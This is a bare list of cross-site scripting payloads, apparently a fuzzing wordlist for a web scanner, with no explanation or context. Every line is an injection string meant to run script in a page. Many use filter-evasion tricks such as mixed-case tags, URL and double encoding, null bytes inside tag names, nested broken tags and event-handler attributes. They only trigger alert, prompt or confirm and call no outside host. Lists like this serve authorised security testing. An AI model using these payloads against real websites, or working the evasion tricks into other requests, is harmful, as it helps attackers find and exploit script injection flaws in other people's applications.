<SCRIPT>alert('XSS');</SCRIPT>
<script>alert('xssya')</script>
<script>alert(\"xssya\")</script>
1<ScRiPt>prompt(999691)</ScRiPt>"
//1<ScRiPt>prompt(919397)</ScRiPt>
%22%3Cscript%3Ealert%28%27XSSYA%27%29%3C%2Fscript%3E
'\"</scRipt><scRipt>alert('xssya')</scRipt>
1%253CScRiPt%2520%253Eprompt%28962477%29%253C%2fsCripT%253E
<scRiPt>alert(1);</scrIPt>
\"><scRipt>alert('xssya')</scRipt>
'';!--\"<XSS>=&{()}
<q/oncut=alert(1)>
\";alert(1)//
%3CScRipt%3EALeRt(%27xssya%27)%3B%3C%2FsCRipT%3E
%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(%27xss%27)%3C/scRipt%3E
<scr<script>ipt>alert(1)</scr<script>ipt>
javascript:alert(1)//
<scri%00pt>alert(1);</scri%00pt>
<s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t> 
%3cscript%3ealert(%27XSSYA%27)%3c%2fscript%3e
%22;alert%28%27XSS%29//
<svg><script>alert&#40/1/&#41</script>
&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;
<scri%00pt>alert(1);</scri%00pt>
<scri%00pt>confirm(0);</scri%00pt>